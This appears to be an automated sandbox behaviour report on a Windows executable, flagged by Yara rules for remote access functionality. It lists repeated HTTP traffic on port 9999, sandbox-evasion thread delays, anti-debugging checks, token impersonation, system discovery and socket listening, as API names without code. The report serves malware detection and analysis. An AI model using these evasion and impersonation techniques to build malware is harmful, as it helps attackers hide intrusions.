Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54278
Source: unknown	Network traffic detected: HTTP traffic on port 54287 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54287
Source: unknown	Network traffic detected: HTTP traffic on port 54295 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54295
Source: unknown	Network traffic detected: HTTP traffic on port 54301 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54301
Source: unknown	Network traffic detected: HTTP traffic on port 54310 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54310
Source: unknown	Network traffic detected: HTTP traffic on port 54318 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54318
Source: unknown	Network traffic detected: HTTP traffic on port 54319 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54319
Source: unknown	Network traffic detected: HTTP traffic on port 54320 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54320
Source: unknown	Network traffic detected: HTTP traffic on port 54321 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54321
Source: unknown	Network traffic detected: HTTP traffic on port 54322 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54322
Source: unknown	Network traffic detected: HTTP traffic on port 54323 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54323
Source: unknown	Network traffic detected: HTTP traffic on port 54324 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54324
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54325
Source: unknown	Network traffic detected: HTTP traffic on port 54326 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54326
Source: unknown	Network traffic detected: HTTP traffic on port 54327 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54327
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54328
Source: unknown	Network traffic detected: HTTP traffic on port 54329 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54329
Source: unknown	Network traffic detected: HTTP traffic on port 54330 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54330
Source: unknown	Network traffic detected: HTTP traffic on port 54331 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54331
Source: unknown	Network traffic detected: HTTP traffic on port 54332 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54332
Source: unknown	Network traffic detected: HTTP traffic on port 54333 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54333
Source: unknown	Network traffic detected: HTTP traffic on port 54334 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54334
Source: unknown	Network traffic detected: HTTP traffic on port 54335 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54335
Source: unknown	Network traffic detected: HTTP traffic on port 54336 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54336
Source: unknown	Network traffic detected: HTTP traffic on port 54337 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54337
Source: unknown	Network traffic detected: HTTP traffic on port 54338 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54338
Source: unknown	Network traffic detected: HTTP traffic on port 54339 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54339
Source: unknown	Network traffic detected: HTTP traffic on port 54340 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54340
Source: unknown	Network traffic detected: HTTP traffic on port 54341 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54341
Source: unknown	Network traffic detected: HTTP traffic on port 54342 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54342
Source: unknown	Network traffic detected: HTTP traffic on port 54343 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54343
Source: unknown	Network traffic detected: HTTP traffic on port 54344 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54344
Source: unknown	Network traffic detected: HTTP traffic on port 54345 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54345
Source: unknown	Network traffic detected: HTTP traffic on port 54346 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54346
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54347
Source: unknown	Network traffic detected: HTTP traffic on port 54348 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54348
Source: unknown	Network traffic detected: HTTP traffic on port 54349 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54349
Source: unknown	Network traffic detected: HTTP traffic on port 54350 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54350
Source: unknown	Network traffic detected: HTTP traffic on port 54351 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54351
Source: unknown	Network traffic detected: HTTP traffic on port 54352 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54352
Source: unknown	Network traffic detected: HTTP traffic on port 54353 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54353
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54354
Source: unknown	Network traffic detected: HTTP traffic on port 54355 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54355
Source: unknown	Network traffic detected: HTTP traffic on port 54356 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54356
Source: unknown	Network traffic detected: HTTP traffic on port 54357 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54357
Source: unknown	Network traffic detected: HTTP traffic on port 54358 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 54359 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54359
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54360
Source: unknown	Network traffic detected: HTTP traffic on port 54361 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54361
Source: unknown	Network traffic detected: HTTP traffic on port 54362 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54362
Source: unknown	Network traffic detected: HTTP traffic on port 54363 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54363
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54364
Source: unknown	Network traffic detected: HTTP traffic on port 54365 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54365
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54366
Source: unknown	Network traffic detected: HTTP traffic on port 54367 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54367
Source: unknown	Network traffic detected: HTTP traffic on port 54368 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54368
Source: unknown	Network traffic detected: HTTP traffic on port 54369 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54369
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54370
Source: unknown	Network traffic detected: HTTP traffic on port 54371 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54371
Source: unknown	Network traffic detected: HTTP traffic on port 54372 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54372
Source: unknown	Network traffic detected: HTTP traffic on port 54373 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54373
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54374
Source: unknown	Network traffic detected: HTTP traffic on port 54375 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54375
Source: unknown	Network traffic detected: HTTP traffic on port 54376 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54376
Source: unknown	Network traffic detected: HTTP traffic on port 54377 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54377
Source: unknown	Network traffic detected: HTTP traffic on port 54378 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54378
Source: unknown	Network traffic detected: HTTP traffic on port 54379 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54379
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54380
Source: unknown	Network traffic detected: HTTP traffic on port 54381 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54381
Source: unknown	Network traffic detected: HTTP traffic on port 54382 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54382
Source: unknown	Network traffic detected: HTTP traffic on port 54383 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54383
Source: unknown	Network traffic detected: HTTP traffic on port 54384 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54384
Source: unknown	Network traffic detected: HTTP traffic on port 54385 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54385
Source: unknown	Network traffic detected: HTTP traffic on port 54386 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54386
Source: unknown	Network traffic detected: HTTP traffic on port 54387 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54387
Source: unknown	Network traffic detected: HTTP traffic on port 54388 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54388
Source: unknown	Network traffic detected: HTTP traffic on port 54389 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54389
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54390
Source: unknown	Network traffic detected: HTTP traffic on port 54391 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54391
Source: unknown	Network traffic detected: HTTP traffic on port 54392 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54392
Source: unknown	Network traffic detected: HTTP traffic on port 54393 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54393
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 54395 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 54397 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54397
Source: unknown	Network traffic detected: HTTP traffic on port 54398 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54398
Source: unknown	Network traffic detected: HTTP traffic on port 54399 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54399
Source: unknown	Network traffic detected: HTTP traffic on port 54400 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54400
Source: unknown	Network traffic detected: HTTP traffic on port 54401 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54401
Source: unknown	Network traffic detected: HTTP traffic on port 54402 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54402
Source: unknown	Network traffic detected: HTTP traffic on port 54403 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54403
Source: unknown	Network traffic detected: HTTP traffic on port 54404 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54404
Source: unknown	Network traffic detected: HTTP traffic on port 54405 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54405
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 54407 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54407
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54408
Source: unknown	Network traffic detected: HTTP traffic on port 54409 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54409
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54410
Source: unknown	Network traffic detected: HTTP traffic on port 54411 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54411
Source: unknown	Network traffic detected: HTTP traffic on port 54412 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54412
Source: unknown	Network traffic detected: HTTP traffic on port 54413 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54413
Source: unknown	Network traffic detected: HTTP traffic on port 54414 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54414
Source: unknown	Network traffic detected: HTTP traffic on port 54415 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54415
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54416
Source: unknown	Network traffic detected: HTTP traffic on port 54417 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54417
Source: unknown	Network traffic detected: HTTP traffic on port 54418 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54418
Source: unknown	Network traffic detected: HTTP traffic on port 54419 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54419
Source: unknown	Network traffic detected: HTTP traffic on port 54420 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54420
Source: unknown	Network traffic detected: HTTP traffic on port 54421 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54421
Source: unknown	Network traffic detected: HTTP traffic on port 54422 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54422
Source: unknown	Network traffic detected: HTTP traffic on port 54423 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54423
Source: unknown	Network traffic detected: HTTP traffic on port 54424 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54424
Source: unknown	Network traffic detected: HTTP traffic on port 54425 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54425
Source: unknown	Network traffic detected: HTTP traffic on port 54426 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54426
Source: unknown	Network traffic detected: HTTP traffic on port 54427 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54427
Source: unknown	Network traffic detected: HTTP traffic on port 54428 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54428
Source: unknown	Network traffic detected: HTTP traffic on port 54429 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54429
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54430
Source: unknown	Network traffic detected: HTTP traffic on port 54431 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54431
Source: unknown	Network traffic detected: HTTP traffic on port 54432 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54432
Source: unknown	Network traffic detected: HTTP traffic on port 54433 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54433
Source: unknown	Network traffic detected: HTTP traffic on port 54434 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54434
Source: unknown	Network traffic detected: HTTP traffic on port 54435 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54435
Source: unknown	Network traffic detected: HTTP traffic on port 54436 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54436
Source: unknown	Network traffic detected: HTTP traffic on port 54437 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54437
Source: unknown	Network traffic detected: HTTP traffic on port 54438 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54438
Source: unknown	Network traffic detected: HTTP traffic on port 54439 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54439
Source: unknown	Network traffic detected: HTTP traffic on port 54440 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 54441 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54441
Source: unknown	Network traffic detected: HTTP traffic on port 54442 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54442
Source: unknown	Network traffic detected: HTTP traffic on port 54443 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54443
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54444
Source: unknown	Network traffic detected: HTTP traffic on port 54445 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54445
Source: unknown	Network traffic detected: HTTP traffic on port 54446 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 54447 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54447
Source: unknown	Network traffic detected: HTTP traffic on port 54448 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54448
Source: unknown	Network traffic detected: HTTP traffic on port 54449 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54449
Source: unknown	Network traffic detected: HTTP traffic on port 54450 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54450
Source: unknown	Network traffic detected: HTTP traffic on port 54451 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54451
Source: unknown	Network traffic detected: HTTP traffic on port 54452 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54452
Source: unknown	Network traffic detected: HTTP traffic on port 54453 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54453
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54454
Source: unknown	Network traffic detected: HTTP traffic on port 54455 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54455

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D76BE7		0_2_03D76BE7
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D73303		0_2_03D73303

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Window / User API: threadDelayed 5464			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Window / User API: threadDelayed 4290			Jump to behavior

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

API coverage: 8.1 %

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D73303

0_2_03D73303

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep count: 5464 > 30			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep time: -54640000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6524	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep count: 4290 > 30			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep time: -42900000s >= -30000s			Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D791F0 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,		0_2_03D791F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D747C9 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03D747C9

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.0000000000775000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D963F5 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,DebugBreak,

0_2_03D963F5

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D96BD4 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,

0_2_03D96BD4

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7A2E1 mov eax, dword ptr fs:[00000030h]		0_2_03D7A2E1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D79641 mov eax, dword ptr fs:[00000030h]		0_2_03D79641
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03978A8F mov eax, dword ptr fs:[00000030h]		0_2_03978A8F
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0397972F mov eax, dword ptr fs:[00000030h]		0_2_0397972F

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D930BC CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_03D930BC

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,		0_2_0040116C
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_00401A5C
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_00401A60
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,		0_2_00401160
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,		0_2_004013C1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,		0_2_004011A3
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8D2CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_03D8D2CE
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8F4F0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_03D8F4F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8949D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_03D8949D

HIPS / PFW / Operating System Protection Evasion

Source: Yara match

File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7B9E9 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_03D7B9E9

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7BBA5 GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_03D7BBA5

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: GetLocaleInfoA,

0_2_03D9351D

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_0040161C

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_004019A0

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D76C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_03D76C99

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D76C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_03D76C99

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: vNenBbeRFZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vNenBbeRFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.400000.0.unpack, type: UNPACKEDPE

Source: Yara match

File source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7733D htonl,htons,socket,closesocket,bind,ioctlsocket,		0_2_03D7733D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7725B socket,htons,ioctlsocket,closesocket,bind,listen,		0_2_03D7725B
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7BFB7 socket,closesocket,htons,bind,listen,		0_2_03D7BFB7